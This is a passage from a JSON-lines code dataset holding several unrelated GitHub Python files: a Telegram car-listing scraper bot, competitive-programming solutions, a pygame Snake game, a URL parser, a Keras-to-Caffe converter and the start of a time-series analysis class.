message.text\n if (mod.isdigit()) and (int(mod) > 0) and (int(mod) < 4):\n async with state.proxy() as date:\n date ['search_parameter'] = mod\n if int(mod) == 1:\n await filter.first(message, state)\n elif int(mod) == 2:\n await filter.second(message, state)\n elif int(mod) == 3:\n await filter.third(message, state)\n \n await open_advertisement(message)\n else:\n await message.answer(\"Вы ввели некорректное значение. Повторите попытку!\")\n await FSMFind.search_parameter.set()\n\n \n\nasync def pars(message: types.Message, state: FSMContext):\n # ЗАВЕРШЕНИЕ\n global href_car\n href_car = [] \n name_country = None\n name_radius = None\n name_model = None\n name_full_model = None\n name_year = None\n async with state.proxy() as date:\n name_year = date['year']\n name_country = date['country']\n name_radius = date['radius']\n name_model = date['model']\n name_model = translit(name_model, language_code='ru', reversed=True)\n name_model = name_model.replace(\" \", \"_\")\n name_full_model = date['full_model']\n name_full_model = name_full_model.replace(\" \", \"_\")\n name_full_model = translit(name_full_model, language_code='ru', reversed=True)\n int_year = int(name_year)\n min_year = str(int_year - 1)\n max_year = str(int_year + 1)\n cars_after_find = []\n for i in range(1, 6):\n url = name_country.lower() + name_model.lower() + '/' + name_full_model.lower() + \"/page\" + str(i) + '/?distance=' + name_radius + '&maxyear=' + max_year + '&minyear=' + min_year + '&unsold=1'\n r = requests.get(url)\n soup = bs(r.text, 'html.parser')\n first_find = soup.find('div', class_ ='css-1nvf6xk eojktn00')\n second_find = []\n for first in first_find:\n second_find += first.find_all(\"a\", class_ = \"css-xb5nz8 e1huvdhj1\")\n for items in second_find:\n items = items.get('href')\n href_car.append (items)\n if len(href_car) == 0:\n await message.answer (\"По вашему запросу ничего не найдено.\")\n await state.finish()\n\nasync def open_advertisement(message: types.Message):\n f = 9\n\nasync def cancel_handler(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await message.answer ('OK')\n\n#РЕГИСТРАТОР \ndef register_handlers_find(dp: Dispatcher):\n dp.register_message_handler(Find, commands = ['поиск', 'Поиск', 'Искать', 'start', 'find'], state = None)\n dp.register_message_handler(model, state = FSMFind.model)\n dp.register_message_handler(full_model, state = FSMFind.full_model)\n dp.register_message_handler(year, state = FSMFind.year)\n dp.register_message_handler(country_find, state = FSMFind.country)\n dp.register_message_handler(radius, state = FSMFind.radius)\n dp.register_message_handler(search_parameter, state = FSMFind.search_parameter)\n dp.register_message_handler(cancel_handler, state=\"*\", commands='отмена')\n dp.register_message_handler(cancel_handler, Text(equals='отмена', ignore_case=True), state=\"*\")\n\nasync def ckek_model(model, brand):\n brand = brand.capitalize()\n model = model.capitalize()\n database_name = 'database.db'\n brand_table_name = \"brand\"\n brand_column_name = \"name_brand\"\n brand_search_value = brand\n\n # Получаем id_brand из таблицы brand\n id_brand_value = get_id_brand(database_name, brand_search_value)\n\n id_brand_value = id_brand_value[0] # Преобразуем кортеж в значение строки\n print (id_brand_value)\n\n model_table_name = \"model\"\n model_column_id = \"id_brand\"\n model_column_name = \"name_model\"\n model_search_value = model\n\n if check_model_exists(database_name, model_table_name, model_column_id, model_column_name, id_brand_value, model_search_value):\n return False\n else:\n return True\n\n\ndef get_id_brand(database, search_value):\n # Устанавливаем соединение с базой данных\n connection = sq.connect(database)\n cursor = connection.cursor()\n\n # Выполняем запрос для получения id_brand\n query = f\"SELECT id_brand FROM brand WHERE name_brand = ?\"\n cursor.execute(query, (search_value,))\n\n # Извлекаем результат запроса\n id_brand = cursor.fetchone()\n\n # Закрываем соединение с базой данных\n cursor.close()\n connection.close()\n\n return id_brand\n\n# ПРОВЕРКА \ndef check_model_exists(database, table, column_id, column_name, id_value, name_value):\n # Устанавливаем соединение с базой данных\n connection = sq.connect(database)\n cursor = connection.cursor()\n\n # Выполняем запрос для проверки существования строки в таблице model\n query = f\"SELECT COUNT(*) FROM {table} WHERE {column_id} = ? AND {column_name} = ?\"\n cursor.execute(query, (id_value, name_value))\n\n # Извлекаем результат запроса\n row_count = cursor.fetchone()[0]\n\n # Закрываем соединение с базой данных\n cursor.close()\n connection.close()\n\n # Проверяем количество строк\n if row_count > 0:\n return True\n else:\n return False\n\n# ПРОВЕРКА МАРКИ\nasync def check_brand(brand):\n brand = brand.capitalize()\n conn = sq.connect('database.db')\n cursor = conn.cursor()\n\n query = f\"SELECT COUNT(*) FROM brand WHERE name_brand = ?\"\n cursor.execute(query, (brand,))\n row_count = cursor.fetchone()[0]\n if row_count > 0:\n return False\n else:\n return True\n\nasync def country(URL_for_find, mess):\n ru_text = mess.lower()\n name_country = ''\n if ru_text.lower() == \"москва\":\n name_country = \"moscow\"\n elif (ru_text.lower() == \"санкт-петербург\") or (ru_text.lower() == \"питер\"):\n name_country = \"spb\"\n else:\n name_country = translit(ru_text, language_code='ru', reversed=True)\n name_country = name_country.replace(\"'\", \"\")\n name_country = name_country.replace(\" \", \"-\")\n ret = (\"https://\" + name_country + URL_for_find) \n print (ret)\n return ret\n\nasync def checker(URL):\n async with aiohttp.ClientSession() as session:\n async with session.get(URL) as response:\n status_code = response.status\n print(status_code)\n print(URL)\n if status_code == 200:\n return True\n else:\n return False\n\n\t\t# # https://moscow.drom.ru/kia/all/page2/\n\t\t# cars_after_find = []\n\t\t# for i in range(1, 6):\n\t\t# \tr = main.requests.get(\"https://\" + name_country + URL_for_find + \"all/page\" + str(i) + \"/\")\n\t\t# \tsoup = main.bs(r.text, 'html.parser')\n\t\t# \tfind_tegs = soup.find_all(\"div\", class_ = \"css-l1wt7n e3f4v4l2\")\n\t\t# \tfor items in find_tegs:\n\t\t# \t\tcars_after_find += items.find_all(\"span\")\n\t\t# clear_c_f = [c.text for c in cars_after_find]\n\t\t# await message.answer(clear_c_f)","repo_name":"Overchenko-Egor/RGR","sub_path":"find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18311134415","text":"# 문제 정의 : 정해진 개수 c개의 공유기를 최대한 멀리 떨구기\n# => 정해진 거리 미만으로 공유기 설치를 못할 때 공유기 설치 최대 갯수 구하기.\n\nn, c = map(int, input().split())\n\n# 공유기 정보 받기\nlst = [int(input()) for _ in range(n)]\n\nlst.sort()\n\nstart = 1\nend = lst[-1] - lst[0]\n\nresult = 0\n\nwhile (start <= end):\n mid = (start + end) // 2 # 정해진 거리\n\n cnt = 1 # 첫 위치에 무조건 설치\n\n old = lst[0]\n for i in range(1, len(lst)):\n if (lst[i] - old) >= mid: # 정해진 거리보다 짧으면\n cnt += 1 # 설치\n old = lst[i] # 다음 거리 구하기\n \n if cnt >= c: # 공유기를 너무 많이 깔았다 => 정해진 거리 늘려야.\n start = mid + 1\n result = mid\n\n else: # 공유기를 너무 적게 깔았다. => 정해진 거리 줄여야.(너무 규제가 심핟..)\n end = mid - 1\n\nprint(result)","repo_name":"KSY1526/BaekJun_Code_Shape","sub_path":"230213/2110 공유기 설치.py","file_name":"2110 공유기 설치.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18728603412","text":"'''\nCreated on Jul 13, 2021\n\n@author: sohamdigambar\n'''\n\nimport pygame\nimport random\nfrom enum import Enum\nfrom collections import namedtuple\n\npygame.init()\n\nfont = pygame.font.SysFont('arial', 25)\n\nPoint = namedtuple('Point', 'x, y') #this is basically a lightweight class that makes it easier to read coordinates\n\nBLOCK_SIZE = 20 #20 pixels represents 1 snake \"block\"\nSPEED = 15\n\n#RGB colors\nWHITE = (255, 255, 255)\nRED = (200, 0, 0)\nBLUE1 = (0, 0, 255)\nBLUE2 = (0, 100, 255)\nBLACK = (0, 0, 0)\n\n\nclass Direction(Enum):\n RIGHT = 1\n LEFT = 2\n UP = 3\n DOWN = 4\n\nclass SnakeGame:\n \n def __init__(self, width = 640, height = 480):\n self.width = width\n self.height = height\n \n #initialize display\n self.display = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(\"Snake Game\")\n self.clock = pygame.time.Clock()\n \n \n #initialize game state\n self.direction = Direction.RIGHT\n self.head = Point(self.width / 2, self.height / 2) #starts in the center\n self.snake = [self.head, \n Point(self.head.x - BLOCK_SIZE, self.head.y),\n Point(self.head.x - (2 * BLOCK_SIZE), self.head.y)] #creates the snake based on the head position\n self.score = 0\n self.food = None\n self._place_food()\n \n \n \n def _place_food(self):\n x = random.randint(0, (self.width - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n y = random.randint(0, (self.height - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n self.food = Point(x, y)\n if self.food == self.snake:\n self.place_food() #uses recursion to ensure food is NOT spawned in the snake \n \n \n \n def play_step(self):\n #collects user input (direction)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.direction = Direction.LEFT\n elif event.key == pygame.K_RIGHT:\n self.direction = Direction.RIGHT\n elif event.key == pygame.K_UP:\n self.direction = Direction.UP\n elif event.key == pygame.K_DOWN:\n self.direction = Direction.DOWN\n \n #moves snake\n self._move(self.direction) #updates the head\n self.snake.insert(0, self.head)\n \n #checks if game is over\n game_over = False\n if self._is_collision():\n game_over = True\n return game_over, self.score\n \n #places new food or move the snake\n if self.head == self.food:\n self.score += 1\n self._place_food()\n else:\n self.snake.pop()\n \n #updates ui and clock\n self._update_ui()\n self.clock.tick(SPEED)\n \n #returns game over and score \n game_over = False\n return game_over, self.score\n\n\n\n def _update_ui(self):\n self.display.fill(BLACK)\n \n for point in self.snake:\n pygame.draw.rect(self.display, BLUE1, pygame.Rect(point.x, point.y, BLOCK_SIZE, BLOCK_SIZE))\n pygame.draw.rect(self.display, BLUE2, pygame.Rect(point.x + 4, point.y + 4, 12, 12)) #spaces between each snake block\n \n pygame.draw.rect(self.display, RED, pygame.Rect(self.food.x, self.food.y, BLOCK_SIZE, BLOCK_SIZE))\n \n text = font.render(\"Score: \" + str(self.score), True, WHITE)\n self.display.blit(text, [0, 0])\n pygame.display.flip() #allows us to see the changes when we run the update method\n\n\n\n def _is_collision(self):\n #if snake hits boundary\n if self.head.x > self.width - BLOCK_SIZE or self.head.x < 0 or self.head.y > self.height - BLOCK_SIZE or self.head.y < 0:\n return True\n \n #if snake hits itself\n if self.head in self.snake[1:]:\n return True\n \n return False\n \n \n\n def _move(self, direction):\n x = self.head.x\n y = self.head.y\n \n if direction == Direction.RIGHT:\n x += BLOCK_SIZE\n elif direction == Direction.LEFT:\n x -= BLOCK_SIZE\n elif direction == Direction.UP:\n y -= BLOCK_SIZE\n elif direction == Direction.DOWN:\n y += BLOCK_SIZE\n \n self.head = Point(x, y)\n \n\nif __name__ == '__main__':\n game = SnakeGame()\n \n #game loop\n while True:\n game_over, score = game.play_step()\n \n #break if game over\n if game_over == True:\n break\n \n print('Final Score: ', score)\n \n pygame.quit()","repo_name":"SohamDigambar/PythonProjects","sub_path":"Python game/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25581176659","text":"# https://atcoder.jp/contests/code-festival-2014-final/tasks/code_festival_final_e\nimport sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef read_ints():\n return list(map(int, read().split()))\n\n\ndef read_a_int():\n return int(read())\n\n\nN = read_a_int()\nR = read_ints()\n\nif N < 3:\n print(0)\n exit()\n\n# 愚直に極大点極小点を列挙すれば良いのでは...\n# また端点は必ず含まれるのだから+2しておけば良い\n# フラットになっている部分は注意→事前に取り除いておけば良い\nRR = []\npre = 10**9\nfor r in R:\n if pre != r:\n RR.append(r)\n pre = r\n\n\nans = 0\nfor i in ra(1, len(RR) - 1):\n pre = RR[i - 1]\n now = RR[i]\n nex = RR[i + 1]\n if pre > now < nex or pre < now > nex:\n ans += 1\n\nprint(ans + 2 if ans != 0 else 0)\n","repo_name":"masakiaota/kyoupuro","sub_path":"practice/green_diff/code_festival_final_e/code_festival_final_e.py","file_name":"code_festival_final_e.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24915619625","text":"from dataclasses import dataclass\nfrom pprint import pprint\nfrom typing import Tuple\nfrom urllib.parse import urlparse, parse_qs, unquote\n\n\n@dataclass\nclass ParsedURL:\n\n controller_path: str\n path: str\n queries: dict[str, list[str]] | None\n\n\ndef parse_url(url: str) -> ParsedURL:\n\n unquoted_url = unquote(url)\n parsed_url = urlparse(unquoted_url)\n queries = parse_qs(parsed_url.query)\n controller, path = _parse_path(parsed_url.path)\n return ParsedURL(controller, path, queries)\n\n\ndef _parse_path(path: str) -> Tuple[str, str]:\n\n if path.startswith(\"/\"):\n path = path[1:]\n\n path_components = path.split(\"/\", 1)\n # Only controller name present\n if len(path_components) == 1:\n return path_components[0], \"\"\n return path_components[0], path_components[1]\n\n\nif __name__ == \"__main__\":\n\n url = \"/controller_name/other-path-related-stuff/blah/blah/blah\"\n parsed_url = parse_url(url)\n print()\n pprint(parsed_url.__dict__)\n print()\n","repo_name":"VisakhChekur/web-framework-py","sub_path":"src/url_parser/url_parser.py","file_name":"url_parser.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21259931068","text":"import os\r\nimport sys\r\ncaffe_root='/home/qxd/workspace/caffeBVLCplus'\r\nsys.path.insert(0,os.path.join(caffe_root,'python'))\r\nimport caffe\r\nfrom caffe import layers as L, params as P\r\nimport math\r\nimport numpy as np\r\n\r\ndef set_padding(config_keras, input_shape, config_caffe):\r\n if config_keras['padding'] == 'valid':\r\n return\r\n elif config_keras['padding'] == 'same':\r\n # pad = ((layer.output_shape[1] - 1)*strides[0] + pool_size[0] - layer.input_shape[1])/2\r\n # pad = pool_size[0]/(strides[0]*2)\r\n # pad = (pool_size[0]*layer.output_shape[1] - (pool_size[0]-strides[0])*(layer.output_shape[1]-1) - layer.input_shape[1])/2\r\n \r\n if 'kernel_size' in config_keras:\r\n kernel_size = config_keras['kernel_size']\r\n elif 'pool_size' in config_keras:\r\n kernel_size = config_keras['pool_size']\r\n else:\r\n raise Exception('Undefined kernel size')\r\n pad_w = int(kernel_size[1] / 2)\r\n pad_h = int(kernel_size[0] / 2)\r\n if config_keras['dilation_rate'][0]>1:\r\n pad_w=2\r\n pad_h=2\r\n strides = config_keras['strides']\r\n w = input_shape[1]\r\n h = input_shape[2]\r\n \r\n out_w = math.ceil(w / float(strides[1]))\r\n # pad_w = int((kernel_size[1]*out_w - (kernel_size[1]-strides[1])*(out_w - 1) - w)/2)\r\n \r\n out_h = math.ceil(h / float(strides[0]))\r\n # pad_h = int((kernel_size[0]*out_h - (kernel_size[0]-strides[0])*(out_h - 1) - h)/2)\r\n \r\n if pad_w == 0 and pad_h == 0:\r\n return\r\n \r\n if pad_w == pad_h:\r\n config_caffe['pad'] = pad_w\r\n else:\r\n config_caffe['pad_h'] = pad_h\r\n config_caffe['pad_w'] = pad_w\r\n \r\n else:\r\n raise Exception(config_keras['padding']+' padding is not supported')\r\ndef convert(keras_model, caffe_net_file, caffe_params_file):\r\n caffe_net = caffe.NetSpec()\r\n net_params = dict()\r\n outputs = dict()\r\n shape = ()\r\n input_str = ''\r\n\r\n for layer in keras_model.layers:\r\n name = layer.name\r\n print('processing'+name+\"================================================================================\")\r\n layer_type = type(layer).__name__\r\n config = layer.get_config()\r\n blobs = layer.get_weights()\r\n blobs_num = len(blobs)\r\n\r\n top2='qinxiao'\r\n if type(layer.output) == list:\r\n # raise Exception('Layers with multiply outputs are not supported')\r\n top=layer.output[0].name\r\n else: \r\n top = layer.output.name\r\n \r\n if type(layer.input) != list:\r\n bottom = layer.input.name\r\n \r\n # data\r\n if layer_type == 'InputLayer' or not hasattr(caffe_net, 'data'):\r\n input_name = 'data'\r\n caffe_net[input_name] = L.Layer()\r\n input_shape = config['batch_input_shape']\r\n input_str = 'input: {}\\ninput_dim: {}\\ninput_dim: {}\\ninput_dim: {}\\ninput_dim: {}'.format('\"' + input_name + '\"',\r\n 1, input_shape[3], input_shape[1], input_shape[2])\r\n outputs[layer.input.name] = input_name\r\n if layer_type == 'InputLayer':\r\n continue\r\n # conv\r\n if layer_type == 'Conv2D' or layer_type == 'Convolution2D':\r\n strides = config['strides']\r\n kernel_size = config['kernel_size']\r\n dilation=config['dilation_rate']\r\n kwargs = {'num_output': config['filters']}\r\n \r\n if dilation[0]==dilation[1]:\r\n kwargs['dilation'] = dilation[0]\r\n if kernel_size[0] == kernel_size[1]:\r\n kwargs['kernel_size'] = kernel_size[0]\r\n else:\r\n kwargs['kernel_h'] = kernel_size[0]\r\n kwargs['kernel_w'] = kernel_size[1]\r\n \r\n if strides[0] == strides[1]:\r\n kwargs['stride'] = strides[0]\r\n else:\r\n kwargs['stride_h'] = strides[0]\r\n kwargs['stride_w'] = strides[1]\r\n \r\n if not config['use_bias']:\r\n kwargs['bias_term'] = False\r\n # kwargs['param']=[dict(lr_mult=0)]\r\n else:\r\n # kwargs['param']=[dict(lr_mult=0), dict(lr_mult=0)]\r\n pass\r\n \r\n set_padding(config, layer.input_shape, kwargs)\r\n \r\n caffe_net[name] = L.Convolution(caffe_net[outputs[bottom]], **kwargs)\r\n\r\n blobs[0] = np.array(blobs[0]).transpose(3, 2, 0, 1)\r\n net_params[name] = blobs\r\n\r\n if config['activation'] == 'relu':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.ReLU(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'sigmoid':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.Sigmoid(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n caffe_net[name_s] = L.TanH(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'linear':\r\n pass\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n elif layer_type == 'Conv2DTranspose':\r\n \r\n # Stride\r\n if layer.strides is None:\r\n strides = (1, 1)\r\n else:\r\n strides = layer.strides\r\n use_bias = config['use_bias']\r\n param = dict(bias_term=use_bias)\r\n\r\n # Padding\r\n if layer.padding == 'same': # Calculate the padding for 'same'\r\n padding = [layer.kernel_size[0] / 2, layer.kernel_size[1] / 2]\r\n else:\r\n padding = [0, 0] # If padding is valid(aka no padding)\r\n\r\n \r\n param['pad']=padding[0]\r\n if strides[0]==2:\r\n param['pad']=0\r\n param['kernel_size']=layer.kernel_size[0]\r\n param['stride']=strides[0]\r\n param['num_output']=layer.filters\r\n\r\n # if strides[0] == strides[1]:\r\n # kwargs['stride'] = strides[0]\r\n # else:\r\n # kwargs['stride_h'] = strides[0]\r\n # kwargs['stride_w'] = strides[1]\r\n caffe_net[name] = L.Deconvolution(caffe_net[outputs[bottom]],\r\n convolution_param=param)\r\n \r\n # caffe_net[name] = L.Deconvolution(caffe_net[outputs[bottom]], **kwargs)\r\n\r\n blobs[0] = np.array(blobs[0]).transpose(3, 2, 0, 1)\r\n net_params[name] = blobs\r\n\r\n if config['activation'] == 'relu':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.ReLU(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'sigmoid':\r\n name_s = name+'s'\r\n caffe_net[name_s] = L.Sigmoid(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n caffe_net[name_s] = L.TanH(caffe_net[name], in_place=True)\r\n elif config['activation'] == 'linear':\r\n pass\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n \r\n if name=='Deconv_2':\r\n name_crop = name+'_crop'\r\n caffe_net.data1 = L.Input(shape=dict(dim=[1, 512, 90, 90]))\r\n caffe_net[name_crop] = L.Crop(caffe_net[name], caffe_net.data1, axis=1, offset=0)\r\n if name=='Deconv_3':\r\n name_crop = name+'_crop'\r\n caffe_net.data2 = L.Input(shape=dict(dim=[1, 256, 180, 180]))\r\n caffe_net[name_crop] = L.Crop(caffe_net[name], caffe_net.data2, axis=1, offset=0)\r\n elif layer_type == 'BatchNormalization':\r\n param = dict()\r\n variance = np.array(blobs[-1])\r\n mean = np.array(blobs[-2])\r\n # print('blobs'+str(blobs_num))\r\n # print(blobs)\r\n\r\n # print('config')\r\n # print(config)\r\n if config['scale']:\r\n gamma = np.array(blobs[0])\r\n sparam = [dict(lr_mult=1), dict(lr_mult=1)]\r\n else:\r\n gamma = np.ones(mean.shape, dtype=np.float32)\r\n # sparam = [dict(lr_mult=0, decay_mult=0), dict(lr_mult=1, decay_mult=1)]\r\n sparam = [dict(lr_mult=0), dict(lr_mult=1)]\r\n # sparam = [dict(lr_mult=0), dict(lr_mult=0)]\r\n \r\n if config['center']:\r\n beta = np.array(blobs[-3])\r\n param['bias_term'] = True\r\n else:\r\n beta = np.zeros(mean.shape, dtype=np.float32)\r\n param['bias_term'] = False\r\n \r\n # caffe_net[name] = L.BatchNorm(caffe_net[outputs[bottom]], moving_average_fraction=layer.momentum, eps=layer.epsilon)\r\n caffe_net[name] = L.BatchNorm(caffe_net[outputs[bottom]], moving_average_fraction=layer.momentum, eps=layer.epsilon)\r\n \r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=1, decay_mult=1), dict(lr_mult=0, decay_mult=0)])\r\n # param = [dict(lr_mult=1), dict(lr_mult=1), dict(lr_mult=0)])\r\n \r\n net_params[name] = (mean, variance, np.array(1.0)) \r\n \r\n name_s = name+'_scale'\r\n \r\n caffe_net[name_s] = L.Scale(caffe_net[name], in_place=True, param=sparam, scale_param={'bias_term': config['center']})\r\n \r\n net_params[name_s] = (gamma, beta)\r\n elif layer_type == 'Activation':\r\n if config['activation'] == 'relu':\r\n # caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]], in_place=True)\r\n if len(layer.input.consumers()) > 1:\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]])\r\n else:\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]], in_place=True)\r\n elif config['activation'] == 'tanh':\r\n if len(layer.input.consumers()) > 1:\r\n caffe_net[name] = L.TanH(caffe_net[outputs[bottom]])\r\n else:\r\n caffe_net[name] = L.TanH(caffe_net[outputs[bottom]], in_place=True)\r\n elif config['activation'] == 'relu6':\r\n caffe_net[name] = L.ReLU(caffe_net[outputs[bottom]])\r\n elif config['activation'] == 'softmax':\r\n caffe_net[name] = L.Softmax(caffe_net[outputs[bottom]], in_place=True)\r\n else:\r\n raise Exception('Unsupported activation '+config['activation'])\r\n \r\n elif layer_type == 'range':\r\n kwargs={}\r\n kwargs['pool'] = P.Pooling.MAX \r\n # config['padding']='same'\r\n pool_size = (3,3)\r\n strides = (2,2)\r\n config['pool_size']=pool_size\r\n config['strides']=strides\r\n if pool_size[0] != pool_size[1]:\r\n raise Exception('Unsupported pool_size')\r\n \r\n if strides[0] != strides[1]:\r\n raise Exception('Unsupported strides')\r\n caffe_net[name] = L.Pooling(caffe_net[outputs[bottom]], kernel_size=pool_size[0], stride=strides[0], **kwargs)\r\n\r\n elif layer_type=='MaxUnpooling2D':\r\n kwargs={}\r\n kwargs['unpool'] = P.Pooling.MAX \r\n # config['padding']='same'\r\n unpool_size = (3,3)\r\n strides = (2,2)\r\n config['unpool_size']=pool_size\r\n config['strides']=strides\r\n if unpool_size[0] != unpool_size[1]:\r\n raise Exception('Unsupported pool_size')\r\n \r\n if strides[0] != strides[1]:\r\n raise Exception('Unsupported strides')\r\n caffe_net[name] = L.Unpooling(caffe_net[outputs[bottom]], unpool=P.Unpooling.MAX,kernel_size=3, unpool_h=360,unpool_w=360)\r\n\r\n elif layer_type == 'Add':\r\n layers = []\r\n for i in layer.input:\r\n layers.append(caffe_net[outputs[i.name]])\r\n caffe_net[name] = L.Eltwise(*layers)\r\n else:\r\n raise Exception('Unsupported layer type: '+layer_type)\r\n outputs[top] = name\r\n if name=='Deconv_2':\r\n outputs[top] = name+'_crop'\r\n if name=='Deconv_3':\r\n outputs[top] = name+'_crop'\r\n net_proto = input_str + '\\n' + 'layer {' + 'layer {'.join(str(caffe_net.to_proto()).split('layer {')[2:])\r\n\r\n f = open(caffe_net_file, 'w') \r\n f.write(net_proto)\r\n print(\"prototxt is done!\")\r\n f.close()\r\n \r\n caffe_model = caffe.Net(caffe_net_file, caffe.TEST)\r\n \r\n for layer in caffe_model.params.keys():\r\n if 'up_sampling2d' in layer:\r\n continue\r\n for n in range(0, len(caffe_model.params[layer])):\r\n print('layer:', layer)\r\n print(\"n:\", n)\r\n print((caffe_model.params[layer][n].data[...]).shape)\r\n print((net_params[layer][n]).shape)\r\n caffe_model.params[layer][n].data[...] = net_params[layer][n]\r\n\r\n caffe_model.save(caffe_params_file)","repo_name":"GoNgXiAoPeNg1/caffe-keras","sub_path":"keras2caffe.py","file_name":"keras2caffe.py","file_ext":"py","file_size_in_byte":13201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"2555190995","text":"import numpy as np\r\nfrom scipy.special import ndtr\r\nfrom bb8TSA.TSA.dataBinModules import BinnedOrganisations, stack_c_DFs\r\nfrom bb8TSA.TSA.statModules import StatIndic\r\nfrom bb8TSA.TSA.tendanceModules import Tendance, constrained_tendance\r\n\r\nclass TimeSeriesAnalysis( BinnedOrganisations, StatIndic, Tendance ):\r\n \"\"\"Time Series Analysis Class.\r\n\r\n Parameters\r\n ----------\r\n BinnedOrganisations : class\r\n Time series construction class.\r\n Time series are kept in a dataframe with 3 columns : organName, date and binCount\r\n Provides methods to bin the data according to given time-bin (freq)\r\n Each bin contains the citation count for a given organisation.\r\n\r\n StatIndic : class\r\n Provides methods to extract statistical indicators for time series extracted by\r\n BinnedOrganisations class.\r\n\r\n Tendance : class\r\n Provides methods to determine increase/decrease tendency in citations for the time series\r\n\r\n\r\n nameCol : str\r\n Column containing the name of the organisations\r\n\r\n dateCol : str\r\n Column containing the measurement date\r\n\r\n countCol : str, optional\r\n Column containing the wait parameter if exist.\r\n\r\n countFlag : Boolean\r\n True if countCol is included. False by default\r\n\r\n\r\n freq : str\r\n The bin size in weeks or a month {\"W\", \"2W\", \"3W\", \"M\"}\r\n default is month (\"M\")\r\n\r\n groupKey : str\r\n For grouping by organisation name. Keep the default value.\r\n\r\n targetCol : str\r\n Target column for aggregations. Keep the default value.\r\n\r\n intp : Boolean\r\n True by default to include interpolation to compute the variability of a time serie.\r\n\r\n numBins : str\r\n Name for the the column to count the total number of bins for each time serie\r\n\r\n medSeuil : float\r\n A factor to define the threshold to detect an outlier count (shock).\r\n outlier > medSeuil * median\r\n\r\n minNumBins : int\r\n Minimum number of bins needed for statistical computations\r\n\r\n meanCount : int\r\n Minimum average accepted number of citations.\r\n\r\n nLeader : int\r\n Size of the list containing the first most cited organisations.\r\n\r\n simpFit : boolean\r\n True to fit a line to time series excluding the shot noises, False otherwise\r\n\r\n noiseRatio : float\r\n This parameter is used to constrain the evident tendencies.\r\n If the ratio between the slope error and the slope of the fitted line are more\r\n than the noisRatio the time serie is excluded.\r\n\r\n memSeuil : float\r\n Maximum memory to be used to load all dataframes in DFs\r\n\r\n Attributes\r\n ----------\r\n tendance_info : dataframe\r\n Contains the name of the organisation, the slope and slope error of the fitted line to the\r\n time serie and the p_value with horizontal line as the null-hypothesis.\r\n\r\n \"\"\"\r\n\r\n def __init__(self, nameCol=\"organName\", dateCol=\"date\", countCol=None, countFlag=False,\r\n freq=\"M\", groupKey=\"organName\", targetCol=\"binCount\", intp=True,\r\n numBins=\"numBins\", medSeuil=20., minNumBins=6, meanCount=20, nLeader=120, simpFit=False,\r\n noiseRatio=.5, memSeuil=5.):\r\n print(\"TimeSeriesAnalysis class initialised.\")\r\n self.groupKey = groupKey\r\n self.nameCol= nameCol\r\n self.dateCol = dateCol\r\n self.countCol = countCol\r\n self.targetCol = targetCol\r\n self.noiseRatio = noiseRatio\r\n self.simpFit = simpFit\r\n self.intp = intp\r\n self.numBins = numBins\r\n self.freq = freq\r\n self.minNumBins = minNumBins\r\n self.meanCount = meanCount\r\n self.countFlag = countFlag\r\n self.medSeuil = medSeuil\r\n self.nLeader = nLeader\r\n self.memSeuil = memSeuil\r\n\r\n print(\"TimeSeriesAnalysis class initialised.\")\r\n BinnedOrganisations.__init__(self, nameCol, dateCol, countCol, freq, minNumBins, countFlag)\r\n StatIndic.__init__(self)\r\n Tendance.__init__(self)\r\n\r\n\r\n def fit(self, DFs, fileList=None):\r\n \"\"\" Extracts statistical information from the input dataframes\r\n Parameters\r\n ----------\r\n DFs : list of dataframes\r\n Dataframes read from different files sources.\r\n Each dataframes should have at least 2 columns : name and date\r\n\r\n fileList : list of str, optional\r\n List containing the name of the source files of the data frames with the same\r\n order as DFs.\r\n\r\n \"\"\"\r\n\r\n self.load_DFs(DFs, fileList)\r\n # (BinnedOrganisations metheod)\r\n\r\n if self.countFlag :\r\n for i, df in enumerate(self._organ_DFs) :\r\n if self.countCol == None :\r\n raise KeyError( \"countCol name not specified.\" )\r\n elif self.countCol not in self._organ_DFs[i].columns :\r\n raise KeyError(\"{} not found in schema.\".format(self.countCol))\r\n\r\n self._organ_DFs[i] = self._organ_DFs[i][[self.nameCol, self.dateCol, self.countCol]].copy()\r\n self._organ_DFs[i].columns = [\"organName\", \"date\", \"count\"]\r\n else :\r\n for i, df in enumerate(self._organ_DFs):\r\n self._organ_DFs[i] = self._organ_DFs[i][[self.nameCol, self.dateCol]].copy()\r\n self._organ_DFs[i].columns = [\"organName\", \"date\"]\r\n\r\n fit_info = self.compute_tendance_DFs()[ [\"organName\", 